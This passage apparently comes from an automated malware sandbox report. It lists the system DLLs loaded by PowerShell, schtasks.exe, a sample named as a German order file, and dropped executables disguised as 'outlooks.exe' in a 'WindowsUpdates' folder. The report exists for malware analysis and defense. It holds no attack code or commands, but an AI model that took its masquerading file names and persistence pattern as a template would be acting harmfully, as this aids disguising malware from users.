                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptnet.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: winhttp.dll
